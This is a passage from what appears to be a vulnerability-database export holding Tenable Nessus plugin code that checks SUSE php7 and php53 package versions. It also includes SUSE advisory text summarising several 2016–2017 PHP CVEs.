reference:\"php7-debugsource-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-devel-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-dom-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-dom-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-enchant-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-enchant-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-exif-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-exif-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-fastcgi-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-fastcgi-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-fileinfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-fileinfo-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-firebird-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-firebird-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-fpm-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-fpm-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-ftp-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-ftp-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-gd-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-gd-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-gettext-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-gettext-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-gmp-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-gmp-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-iconv-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-iconv-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-imap-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-imap-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-intl-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-intl-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-json-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-json-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-ldap-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-ldap-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-mbstring-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-mbstring-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-mcrypt-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-mcrypt-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-mysql-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-mysql-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-odbc-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-odbc-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-opcache-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-opcache-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-openssl-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-openssl-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pcntl-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pcntl-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pdo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pdo-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pear-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pear-Archive_Tar-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pgsql-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pgsql-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-phar-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-phar-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-posix-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-posix-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pspell-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-pspell-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-readline-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-readline-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-shmop-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-shmop-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-snmp-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-snmp-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-soap-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-soap-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sockets-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sockets-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sqlite-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sqlite-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sysvmsg-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sysvmsg-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sysvsem-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sysvsem-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sysvshm-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-sysvshm-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-tidy-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-tidy-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-tokenizer-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-tokenizer-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-wddx-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-wddx-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xmlreader-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xmlreader-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xmlrpc-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xmlrpc-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xmlwriter-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xmlwriter-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xsl-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-xsl-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-zip-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-zip-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-zlib-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"php7-zlib-debuginfo-7.0.7-14.9.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-mod_php7-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"apache2-mod_php7-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-bcmath-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-bcmath-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-bz2-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-bz2-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-calendar-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-calendar-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-ctype-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-ctype-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-curl-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-curl-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-dba-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-dba-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-debugsource-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-devel-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-dom-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-dom-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-enchant-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-enchant-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-exif-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-exif-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-fastcgi-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-fastcgi-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-fileinfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-fileinfo-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-firebird-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-firebird-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-fpm-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-fpm-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-ftp-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-ftp-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-gd-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-gd-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-gettext-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-gettext-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-gmp-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-gmp-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-iconv-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-iconv-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-imap-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-imap-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-intl-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-intl-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-json-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-json-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-ldap-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-ldap-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-mbstring-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-mbstring-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-mcrypt-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-mcrypt-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-mysql-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-mysql-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-odbc-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-odbc-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-opcache-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-opcache-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-openssl-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-openssl-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pcntl-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pcntl-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pdo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pdo-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pear-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pear-Archive_Tar-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pgsql-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pgsql-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-phar-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-phar-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-posix-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-posix-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pspell-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-pspell-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-readline-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-readline-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-shmop-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-shmop-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-snmp-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-snmp-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-soap-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-soap-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sockets-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sockets-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sqlite-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sqlite-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sysvmsg-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sysvmsg-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sysvsem-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sysvsem-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sysvshm-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-sysvshm-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-tidy-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-tidy-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-tokenizer-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-tokenizer-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-wddx-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-wddx-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xmlreader-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xmlreader-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xmlrpc-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xmlrpc-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xmlwriter-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xmlwriter-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xsl-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-xsl-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-zip-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-zip-debuginfo-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-zlib-7.0.7-19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.3\", reference:\"php7-zlib-debuginfo-7.0.7-19.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_php7 / apache2-mod_php7-debuginfo / php7 / php7-bcmath / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:18:23", "description": "This update for php53 fixes the several issues. These security issues were fixed :\n\n - CVE-2017-12933: The finish_nested_data function in ext/standard/var_unserializer.re was prone to a buffer over-read while unserializing untrusted data.\n Exploitation of this issue could have had an unspecified impact on the integrity of PHP (bsc#1054430).\n\n - CVE-2017-11628: Stack-based buffer overflow in the zend_ini_do_op() function in Zend/zend_ini_parser.c could have caused a denial of service or potentially allowed executing code (bsc#1050726).\n\n - CVE-2017-7890: The GIF decoding function gdImageCreateFromGifCtx in the GD Graphics Library did not zero colorMap arrays use. A specially crafted GIF image could use the uninitialized tables to read ~700 bytes from the top of the stack, potentially disclosing sensitive information (bsc#1050241).\n\n - CVE-2016-5766: Integer overflow in the _gd2GetHeader in the GD Graphics Library (aka libgd) allowed remote attackers to cause a denial of service (heap-based buffer overflow and application crash) or possibly have unspecified other impact via crafted chunk dimensions in an image (bsc#986386).\n\n - CVE-2017-11145: An error in the date extension's timelib_meridian parsing code could have been used by attackers able to supply date strings to leak information from the interpreter, related to ext/date/lib/parse_date.c out-of-bounds reads affecting the php_parse_date function (bsc#1048112).\n\n - CVE-2017-11146: Lack of bounds checks in timelib_meridian parse code could have lead to information leak [bsc#1048111]\n\n - CVE-2016-10397: Incorrect handling of various URI components in the URL parser could have been used by attackers to bypass hostname-specific URL checks (bsc#1047454).\n\n - CVE-2017-11147: The PHAR archive handler could have been used by attackers supplying malicious archive files to crash the PHP interpreter or potentially disclose information due to a buffer over-read in the phar_parse_pharfile function (bsc#1048094).\n\n - CVE-2017-11144: The openssl extension PEM sealing code did not check the return value of the OpenSSL sealing function, which could have lead to a crash of the PHP interpreter (bsc#1048096).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-09-19T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : php53 (SUSE-SU-2017:2522-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-10168", "CVE-2016-10397", "CVE-2016-5766", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11146", "CVE-2017-11147", "CVE-2017-11628", "CVE-2017-12933", "CVE-2017-7890"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:apache2-mod_php53", "p-cpe:/a:novell:suse_linux:php53", "p-cpe:/a:novell:suse_linux:php53-bcmath", "p-cpe:/a:novell:suse_linux:php53-bz2", "p-cpe:/a:novell:suse_linux:php53-calendar", "p-cpe:/a:novell:suse_linux:php53-ctype", "p-cpe:/a:novell:suse_linux:php53-curl", "p-cpe:/a:novell:suse_linux:php53-dba", "p-cpe:/a:novell:suse_linux:php53-dom", "p-cpe:/a:novell:suse_linux:php53-exif", "p-cpe:/a:novell:suse_linux:php53-fastcgi", "p-cpe:/a:novell:suse_linux:php53-fileinfo", "p-cpe:/a:novell:suse_linux:php53-ftp", "p-cpe:/a:novell:suse_linux:php53-gd", "p-cpe:/a:novell:suse_linux:php53-gettext", "p-cpe:/a:novell:suse_linux:php53-gmp", "p-cpe:/a:novell:suse_linux:php53-iconv", "p-cpe:/a:novell:suse_linux:php53-intl", "p-cpe:/a:novell:suse_linux:php53-json", "p-cpe:/a:novell:suse_linux:php53-ldap", "p-cpe:/a:novell:suse_linux:php53-mbstring", "p-cpe:/a:novell:suse_linux:php53-mcrypt", "p-cpe:/a:novell:suse_linux:php53-mysql", "p-cpe:/a:novell:suse_linux:php53-odbc", "p-cpe:/a:novell:suse_linux:php53-openssl", "p-cpe:/a:novell:suse_linux:php53-pcntl", "p-cpe:/a:novell:suse_linux:php53-pdo", "p-cpe:/a:novell:suse_linux:php53-pear", "p-cpe:/a:novell:suse_linux:php53-pgsql", "p-cpe:/a:novell:suse_linux:php53-pspell", "p-cpe:/a:novell:suse_linux:php53-shmop", "p-cpe:/a:novell:suse_linux:php53-snmp", "p-cpe:/a:novell:suse_linux:php53-soap", "p-cpe:/a:novell:suse_linux:php53-suhosin", "p-cpe:/a:novell:suse_linux:php53-sysvmsg", "p-cpe:/a:novell:suse_linux:php53-sysvsem", "p-cpe:/a:novell:suse_linux:php53-sysvshm", "p-cpe:/a:novell:suse_linux:php53-tokenizer", "p-cpe:/a:novell:suse_linux:php53-wddx", "p-cpe:/a:novell:suse_linux:php53-xmlreader", "p-cpe:/a:novell:suse_linux:php53-xmlrpc", "p-cpe:/a:novell:suse_linux:php53-xmlwriter", "p-cpe:/a:novell:suse_linux:php53-xsl", "p-cpe:/a:novell:suse_linux:php53-zip", "p-cpe:/a:novell:suse_linux:php53-zlib", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2017-2522-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103317", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2522-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(103317);\n script_version(\"3.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-10168\", \"CVE-2016-10397\", \"CVE-2016-5766\", \"CVE-2017-11144\", \"CVE-2017-11145\", \"CVE-2017-11146\", \"CVE-2017-11147\", \"CVE-2017-11628\", \"CVE-2017-12933\", \"CVE-2017-7890\");\n\n script_name(english:\"SUSE SLES11 Security Update : php53 (SUSE-SU-2017:2522-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security 